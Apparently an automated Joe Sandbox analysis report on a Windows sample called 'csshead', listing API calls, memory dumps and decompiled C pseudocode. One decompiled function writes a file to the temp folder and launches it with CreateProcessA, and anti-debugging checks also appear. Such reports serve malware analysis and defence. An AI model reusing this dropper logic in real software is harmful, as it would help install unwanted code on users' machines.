    0x00421e72
    0x00421e79
    0x00421e38
    0x00421e4a
    0x00421e4c
    0x00421e50
    0x00421e55
    0x00421e57
    0x00421e62
    0x00421e6a
    0x00421e6a
    0x00421e70
    0x00000000
    0x00421e70
    0x00421e50
    0x00421e7d
    0x00421e1c
    0x00421e1c
    0x00421e1d
    0x00421e22
    0x00421e22

    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421E12
    • GetProcessHeap.KERNEL32(00000018,00000008,?,?,?,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421E41
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421E44
    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421E67
    • HeapFree.KERNEL32(00000000,?,?,?,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421E6A
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041848C
    • RegisterClassExA.USER32 ref: 00418531
    • RegisterClassExA.USER32 ref: 004185D5
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00418604
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 49%
    			E00417E60(void* __ecx, void* __edi, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
    				char _v4;
    				signed int _v8;
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				unsigned int _v24;
    				char _v28;
    				void* _v40;
    				void* __esi;
    				intOrPtr* _t67;
    				signed int _t72;
    				void* _t75;
    				signed int _t76;
    				signed int _t77;
    				signed int _t80;
    				signed int _t83;
    				void* _t84;
    				void* _t85;
    				signed int _t86;
    				signed int _t88;
    				signed int _t93;
    				signed int _t102;
    				signed int _t104;
    				signed int _t107;
    				signed int _t109;
    				signed int _t113;
    				void* _t117;
    				signed int _t122;
    				signed int _t123;
    				signed int _t125;
    				struct HWND__* _t129;
    				signed int _t130;
    				signed int _t139;
    				signed int _t146;
    				struct HWND__* _t178;
    				signed int _t182;
    				struct HWND__* _t183;
    				void* _t184;
    				void* _t185;
    				void* _t186;
    				signed int _t189;
    				unsigned int _t190;
    				intOrPtr* _t192;
    				void* _t202;
    				void* _t204;
    				signed int _t205;
    				void* _t208;
    				void* _t213;
    
    				_t185 = __ecx;
    				 *((intOrPtr*)(__ecx + 8)) = 0;
    				_t67 = E00423911(_t165, __edi, __ecx, __eflags, 0x14, _t184);
    				_t204 = _t202 - 0x10 + 4;
    				if(_t67 == 0) {
    					_v8 = 0;
    					L00423189( &_v4,  &_v8);
    					_v8 = 0x435828;
    					L00423991( &_v8, 0x43c9f8);
    					asm("int3");
    					asm("int3");
    					_t205 = _t204 - 0x18;
    					_t72 = _v4 - 1;
    					__eflags = _t72;
    					_push(_t185);
    					_push(__edi);
    					if(_t72 == 0) {
    						 *0x4335d0(0);
    						_t178 = _a4;
    						_t186 =  *0x433388(_t178);
    						_t75 = _t186 + 9;
    						__eflags = _t75 - 0x400;
    						if(_t75 > 0x400) {
    							_t76 = E00422A18(_t165, _t178, _t186, _t75);
    							_t205 = _t205 + 4;
    							__eflags = _t76;
    							if(_t76 != 0) {
    								 *_t76 = 0xdddd;
    								_t76 = _t76 + 8;
    								__eflags = _t76;
    							}
    							_t139 = _t76;
    						} else {
    							_t76 = L00422450(_t75);
    							_t139 = _t205;
    							__eflags = _t139;
    							if(_t139 != 0) {
    								 *_t139 = 0xcccc;
    								_t139 = _t139 + 8;
    							}
    						}
    						_v20 = _t139;
    						__eflags = _t139;
    						if(_t139 == 0) {
    							L40:
    							_t77 = _t76 | 0xffffffff;
    							__eflags = _t77;
    							return _t77;
    						} else {
    							 *0x43338c(_t178, _t139, _t186 + 1);
    							 *0x433398(_t178, 0x433c2a);
    							_t80 = _a16;
    							_t146 = 0;
    							_t189 = 0;
    							_v28 = 0;
    							__eflags = _t80;
    							if(_t80 != 0) {
    								_t122 =  *_t80;
    								__eflags = _t122;
    								if(_t122 != 0) {
    									_t189 =  *_t122 & 0x0000ffff;
    								}
    							}
    							_v8 = _t146;
    							__eflags = _t189 - _t146;
    							if(_t189 != _t146) {
    								_t182 =  *0x43321c(0x42, _t189);
    								__eflags = _t182;
    								if(_t182 != 0) {
    									_t117 =  *0x433220(_t182);
    									_t165 =  *_a16 + 2;
    									__eflags =  *_a16 + 2;
    									E00401850(_t117, _t189,  *_a16 + 2, _t189);
    									_t205 = _t205 + 0x10;
    									 *0x433224(_t182);
    									 *0x4335e8(_t182, 1,  &_v8);
    								}
    								_t178 = _a4;
    								_t146 = 0;
    								__eflags = 0;
    							}
    							_v12 = _t146;
    							_v16 = _t146;
    							_v24 =  *0x4332a0(_t139) + 1;
    							_t83 = E004036F0( &_v24,  *0x4332a0(_t139) + 1, 2);
    							_t208 = _t205 + 0xc;
    							__eflags = _t83;
    							if(__eflags >= 0) {
    								_t190 = _v24;
    								__eflags = _t190 - 0x400;
    								if(__eflags > 0) {
    									L32:
    									_t84 = L00405440( &_v12, _t178, _t190);
    								} else {
    									_t113 = L00404C30(_t165, __eflags, _t190);
    									_t213 = _t208 + 4;
    									__eflags = _t113;
    									if(_t113 == 0) {
    										goto L32;
    									} else {
    										L00422450(_t190);
    										_t84 = _t213;
    									}
    								}
    								__eflags = _t190 >> 1;
    								_t85 = E00401810(_t84, _t139, _t190 >> 1, 3);
    							} else {
    								_t85 = 0;
    							}
    							_push(0);
    							_push(0);
    							_push(0x436a60);
    							_t86 = L00410680(_v8, __eflags, _t85, _t178, _v8,  &_v16, 0);
    							__eflags = _t86;
    							if(_t86 >= 0) {
    								_t192 = _v16;
    								_t88 =  *((intOrPtr*)( *((intOrPtr*)( *_t192))))(_t192, 0x4361b4,  &_v28);
    								__eflags = _t88;
    								if(_t88 >= 0) {
    									 *0x433408(_t178, 0xffffffeb, _v28);
    									 *((intOrPtr*)( *((intOrPtr*)( *_t192 + 8))))(_t192);
    									L00404940( &_v12);
    									_t93 = _v8;
    									__eflags = _t93;
    									if(_t93 != 0) {
    										 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 8))))(_t93);
    									}
    									E00405480( &_v20);
    									goto L48;
    								} else {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t192 + 8))))(_t192);
    									L00404940( &_v12);
    									_t102 = _v8;
    									__eflags = _t102;
    									if(_t102 != 0) {
    										 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
    									}
    									_t104 = E00405480( &_v20) | 0xffffffff;
    									__eflags = _t104;
    									return _t104;
    								}
    							} else {
    								_t107 = _v16;
    								__eflags = _t107;
    								if(_t107 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
    								}
    								L00404940( &_v12);
    								_t109 = _v8;
    								__eflags = _t109;
    								if(_t109 != 0) {
    									 *((intOrPtr*)( *((intOrPtr*)( *_t109 + 8))))(_t109);
    								}
    								_t76 = E00405480( &_v20);
    								goto L40;
    							}
    						}
    					} else {
    						_t123 = _t72 - 0x81;
    						__eflags = _t123;
    						if(_t123 == 0) {
    							_t125 =  *0x433390(_a4, 0xffffffeb);
    							__eflags = _t125;
    							if(_t125 != 0) {
    								 *((intOrPtr*)( *((intOrPtr*)( *_t125 + 8))))(_t125);
    							}
    							 *0x4335cc();
    						} else {
    							__eflags = _t123 == 0x18e;
    							if(_t123 == 0x18e) {
    								__eflags = _a12 - 1;
    								if(_a12 == 1) {
    									_t129 = _a16;
    									__eflags = _t129;
    									if(_t129 != 0) {
    										_t130 = GetWindowLongA(_t129, 0xffffffec);
    										__eflags = _t130 & 0x00010000;
    										if((_t130 & 0x00010000) != 0) {
    											_t183 = _a4;
    											SetWindowLongA(_t183, 0xffffffec, GetWindowLongA(_t183, 0xffffffec) | 0x00010000);
    										}
    									}
    								}
    							}
    						}
    						L48:
    						return DefWindowProcA(_a4, _a8, _a12, _a16);
    					}
    				} else {
    					 *((intOrPtr*)(_t185 + 4)) = _t67;
    					 *_t67 = _t67;
    					 *((intOrPtr*)( *((intOrPtr*)(_t185 + 4)) + 4)) =  *((intOrPtr*)(_t185 + 4));
    					 *((intOrPtr*)( *((intOrPtr*)(_t185 + 4)) + 8)) =  *((intOrPtr*)(_t185 + 4));
    					 *((char*)( *((intOrPtr*)(_t185 + 4)) + 0x10)) = 1;
    					 *((char*)( *((intOrPtr*)(_t185 + 4)) + 0x11)) = 1;
    					return _t185;
    				}
    			}

    0x00417e64
    0x00417e68
    0x00417e6f
    0x00417e74
    0x00417e79
    0x00417eaa
    0x00417eb2
    0x00417ec1
    0x00417ec9
    0x00417ece
    0x00417ecf
    0x00417ed6
    0x00417ed9
    0x00417ed9
    0x00417edb
    0x00417edc
    0x00417edd
    0x00417f5e
    0x00417f64
    0x00417f6e
    0x00417f70
    0x00417f73
    0x00417f78
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9b
    0x00417f9d
    0x00417fa3
    0x00417fa3
    0x00417fa3
    0x00417fa6
    0x00417f7a
    0x00417f7a
    0x00417f7f
    0x00417f81
    0x00417f83
    0x00417f85
    0x00417f8b
    0x00417f8b
    0x00417f83
    0x00417fa8
    0x00417fab
    0x00417fad
    0x004180d6
    0x004180d6
    0x004180d6
    0x004180e2
    0x00417fb3
    0x00417fb7
    0x00417fc3
    0x00417fc9
    0x00417fcc
    0x00417fce
    0x00417fd0
    0x00417fd3
    0x00417fd5
    0x00417fd7
    0x00417fd9
    0x00417fdb
    0x00417fdd
    0x00417fdd
    0x00417fdb
    0x00417fe0
    0x00417fe3
    0x00417fe5
    0x00417ff0
    0x00417ff2
    0x00417ff4
    0x00417ff7
    0x00418003
    0x00418003
    0x00418009
    0x0041800e
    0x00418012
    0x0041801f
    0x0041801f
    0x00418025
    0x00418028
    0x00418028
    0x00418028
    0x0041802b
    0x0041802e
    0x0041803f
    0x00418042
    0x00418047
    0x0041804a
    0x0041804c
    0x00418052
    0x00418055
    0x0041805b
    0x00418075
    0x00418079
    0x0041805d
    0x0041805e
    0x00418063
    0x00418066
    0x00418068
    0x00000000
    0x0041806a
    0x0041806c
    0x00418071
    0x00418071
    0x00418068
    0x00418080
    0x00418085
    0x0041804e
    0x0041804e
    0x0041804e
    0x0041808d
    0x0041808f
    0x00418091
    0x0041809f
    0x004180a4
    0x004180a6
    0x004180e5
    0x004180f6
    0x004180f8
    0x004180fa
    0x00418139
    0x00418145
    0x0041814a
    0x0041814f
    0x00418152
    0x00418154
    0x0041815c
    0x0041815c
    0x00418161
    0x00000000
    0x004180fc
    0x00418102
    0x00418107
    0x0041810c
    0x0041810f
    0x00418111
    0x00418119
    0x00418119
    0x00418123
    0x00418123
    0x0041812f
    0x0041812f
    0x004180a8
    0x004180a8
    0x004180ab
    0x004180ad
    0x004180b5
    0x004180b5
    0x004180ba
    0x004180bf
    0x004180c2
    0x004180c4
    0x004180cc
    0x004180cc
    0x004180d1
    0x00000000
    0x004180d1
    0x004180a6
    0x00417edf
    0x00417edf
    0x00417edf
    0x00417ee4
    0x00417f3f
    0x00417f45
    0x00417f47
    0x00417f4f
    0x00417f4f
    0x00417f51
    0x00417ee6
    0x00417ee6
    0x00417eeb
    0x00417ef1
    0x00417ef6
    0x00417efc
    0x00417eff
    0x00417f01
    0x00417f10
    0x00417f12
    0x00417f17
    0x00417f1d
    0x00417f2e
    0x00417f2e
    0x00417f17
    0x00417f01
    0x00417ef6
    0x00417eeb
    0x00418166
    0x00418185
    0x00418185
    0x00417e7b
    0x00417e7b
    0x00417e7e
    0x00417e83
    0x00417e89
    0x00417e91
    0x00417e97
    0x00417ea0
    0x00417ea0

    APIs
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,?,?), ref: 004239D3
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D
      • Part of subcall function 00401810: MultiByteToWideChar.KERNEL32(00000001,00000000,00000003,000000FF,?,00000001,00000001,00401D0B,?,?,00000001,00000003), ref: 00401835
      • Part of subcall function 00410680: 80000006.COMCTL32(00000000), ref: 00410749
      • Part of subcall function 00410680: 80000002.OLEAUT32(?), ref: 00410778
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F10
    • GetWindowLongA.USER32(?,000000EC), ref: 00417F23
    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
    • GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
    • OleUninitialize.OLE32 ref: 00417F51
    • OleInitialize.OLE32(00000000), ref: 00417F5E
    • GetWindowTextLengthA.USER32(?), ref: 00417F68
    • GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
    • SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
    • GlobalLock.KERNEL32(00000000), ref: 00417FF7
    • GlobalUnlock.KERNEL32(00000000), ref: 00418012
    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0041801F
    • lstrlenA.KERNEL32(00000000), ref: 00418031
    • SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
    • DefWindowProcA.USER32(?,?,?,?), ref: 00418176
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0041EABB
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000003F), ref: 0041EAD1
    • CreateWindowExA.USER32(00000200,004367A0,00000000,56000001,00000000,00000000,00000001,00000001,?,?,00442B90, 4C), ref: 0041EB01
    • BringWindowToTop.USER32(00000000), ref: 0041EB18
      • Part of subcall function 00418B30: GetClientRect.USER32 ref: 00418B55
      • Part of subcall function 00418B30: SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000014), ref: 00418B90
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 0041F076
    • FlushInstructionCache.KERNEL32(00000000,?,?,00000000), ref: 0041F07D
    • CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 0041F113
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E,?,00421617,?,?,?,?,?,?,?,?,00000000), ref: 0041F097
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004082F4(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v541;
    				char _v1054;
    				struct _STARTUPINFOA _v1124;
    				struct _PROCESS_INFORMATION _v1140;
    				intOrPtr* _t36;
    				intOrPtr _t42;
    				intOrPtr _t58;
    				intOrPtr _t63;
    				intOrPtr _t67;
    				intOrPtr _t78;
    
    				_t36 = __eax -  *__eax;
    				 *_t36 =  *_t36 + _t36;
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = _t36;
    				_v20 = 0;
    				_v24 = E00407CFC(_v12);
    				E00401258( &_v1124, 0x44);
    				_v1124.cb = 0x44;
    				if(_v24 == 0) {
    					_t42 =  *0x40a168; // 0x401dec
    					E00407290(_t42);
    				} else {
    					_v28 = E00401110(_v8, 0x408494);
    					_t102 = _v28;
    					if(_v28 != 0) {
    						GetTempPathA(0x201,  &_v1054);
    						E00407560( &_v1054, 0x408494, _t102);
    						E00401308( &_v541, 0x40849c);
    						E0040133C( &_v541,  &_v1054);
    						E0040133C( &_v541, 0x40849c);
    						_t58 =  *0x40a0a8; // 0x401c4c
    						E0040133C( &_v541, _t58);
    						if( *((char*)(_v28 + 4)) != 0x31) {
    							 *0x40b514 = 0;
    							_t63 =  *0x40b510; // 0x0
    							E00401828(_t63);
    							E004013B4(0x40b510, _v16);
    							_t67 =  *0x40b510; // 0x0
    							E004012B8(_t67, _v16, _v12);
    							 *0x40b514 = _v16;
    							 *0x40be1c = 0;
    							wsprintfA("1530474054", 0x4084a0, _v24);
    						} else {
    							E0040485C( &_v1054, _v16, _v12);
    							Sleep(0x5dc);
    							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
    								_t78 =  *0x40a174; // 0x401e10
    								E00407290(_t78);
    							} else {
    								_v20 = 0xffffffff;
    							}
    						}
    					}
    				}
    				return _v20;
    			}

    0x004082f4
    0x004082f6
    0x00408301
    0x00408304
    0x00408307
    0x0040830c
    0x00408317
    0x00408325
    0x0040832a
    0x00408338
    0x00408481
    0x00408486
    0x0040833e
    0x0040834b
    0x0040834e
    0x00408352
    0x00408364
    0x00408370
    0x00408380
    0x00408393
    0x004083a7
    0x004083af
    0x004083bc
    0x004083cb
    0x0040842d
    0x00408432
    0x00408437
    0x00408444
    0x0040844f
    0x00408454
    0x0040845c
    0x00408461
    0x00408476
    0x004083cd
    0x004083d9
    0x004083e3
    0x00408414
    0x0040841f
    0x00408424
    0x00408416
    0x00408416
    0x00408416
    0x00408414
    0x004083cb
    0x00408352
    0x00408491

    APIs
      • Part of subcall function 00407290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 004072AC
      • Part of subcall function 00407290: CloseHandle.KERNEL32(?), ref: 004072B9
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • GetTempPathA.KERNEL32(00000201,?), ref: 00408364
    • wsprintfA.USER32 ref: 00408476
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
    • Sleep.KERNEL32(000005DC), ref: 004083E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 68%
    			E004062C0(struct HINSTANCE__* _a4, char _a8) {
    				intOrPtr _v0;
    				char _v4;
    				void* _v8;
    				intOrPtr _v20;
    				intOrPtr* _v36;
    				intOrPtr* _t24;
    				intOrPtr* _t29;
    				_Unknown_base(*)()* _t32;
    				intOrPtr* _t34;
    				struct HINSTANCE__* _t37;
    				intOrPtr _t41;
    				void* _t51;
    
    				_v4 = 0;
    				_v8 = 0;
    				_t51 = E00405CB0(_a4, _a8,  &_v4,  &_v8);
    				if(_t51 >= 0) {
    					_t29 = _v8;
    					_t51 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x1c))))(_t29,  &_a8);
    					if(_t51 >= 0) {
    						if( *0x442a2c != 1) {
    							L5:
    							_t32 =  *0x4332e4;
    						} else {
    							_t37 = GetModuleHandleW(L"OLEAUT32.DLL");
    							if(_t37 == 0) {
    								goto L5;
    							} else {
    								_t32 = GetProcAddress(_t37, "UnRegisterTypeLibForUser");
    								if(_t32 == 0) {
    									goto L5;
    								}
    							}
    						}
    						_t41 = _v0;
    						_t51 =  *_t32(_t41,  *(_t41 + 0x18) & 0x0000ffff,  *(_t41 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_t41 + 0x10)),  *((intOrPtr*)(_t41 + 0x14)));
    						_t34 = _v36;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x30))))(_t34, _v20);
    					}
    				}
    				_t24 = _v8;
    				if(_t24 != 0) {
    					 *((intOrPtr*)( *((intOrPtr*)( *_t24 + 8))))(_t24);
    				}
    				 *0x433310(_v4);
    				return _t51;
    			}

    0x004062d8
    0x004062e0
    0x004062ed
    0x004062f1
    0x004062f3
    0x00406304
    0x00406308
    0x00406311
    0x00406332
    0x00406332
    0x00406313
    0x00406318
    0x00406320
    0x00000000
    0x00406322
    0x00406328
    0x00406330
    0x00000000
    0x00000000
    0x00406330
    0x00406320
    0x00406337
    0x00406354
    0x00406356
    0x00406361
    0x00406361
    0x00406308
    0x00406363
    0x00406369
    0x00406371
    0x00406371
    0x00406378
    0x00406384

    APIs
      • Part of subcall function 00405CB0: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00405CF5
      • Part of subcall function 00405CB0: lstrlenW.KERNEL32(?), ref: 00405D61
      • Part of subcall function 00405CB0: lstrlenA.KERNEL32(00000000,00000000,?,?,00000003,?), ref: 00405DD7
      • Part of subcall function 00405CB0: lstrlenA.KERNEL32(?), ref: 00405E13
      • Part of subcall function 00405CB0: 800000A1.OLEAUT32(00000000,?,00000000,?,?,00000003,?), ref: 00405E99
      • Part of subcall function 00405CB0: lstrlenA.KERNEL32(?), ref: 00405EE9
      • Part of subcall function 00405CB0: 800000A1.OLEAUT32(00000000,?,00000000,?,?,00000003,?), ref: 00405F57
      • Part of subcall function 00405CB0: 80000002.OLEAUT32(00000000), ref: 00405F64
    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00406318
    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00406328
    • 80000006.COMCTL32(?), ref: 00406378
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 29%
    			E0041FD50(intOrPtr* __ecx, intOrPtr _a4) {
    				char _v516;
    				void* _t13;
    				intOrPtr _t17;
    				intOrPtr* _t31;
    				char* _t32;
    
    				_t32 =  &_v516;
    				_t31 = __ecx;
    				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x14))))();
    				if(_a4 != 0) {
    					if(_t13 != 0) {
    						_push( *((intOrPtr*)(L00402440(_t13))));
    						_push( &_v516);
    					} else {
    						_push( *((intOrPtr*)(__ecx + 0xc)));
    						_push( &_v516);
    					}
    					lstrcpyA();
    					_t17 =  *((intOrPtr*)(_t31 + 8));
    					if(_t17 > 0) {
    						_push(_t17);
    						wsprintfA( &(_t32[lstrlenA( &_v516) + 0xc]), ":%d");
    					}
    					return SetWindowTextA( *(_t31 - 0x38),  &_v516);
    				}
    				return _t13;
    			}

    0x0041fd50
    0x0041fd57
    0x0041fd5e
    0x0041fd68
    0x0041fd6c
    0x0041fd82
    0x0041fd87
    0x0041fd6e
    0x0041fd71
    0x0041fd76
    0x0041fd76
    0x0041fd88
    0x0041fd8e
    0x0041fd93
    0x0041fd95
    0x0041fdab
    0x0041fdb1
    0x00000000
    0x0041fdbd
    0x0041fdca

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
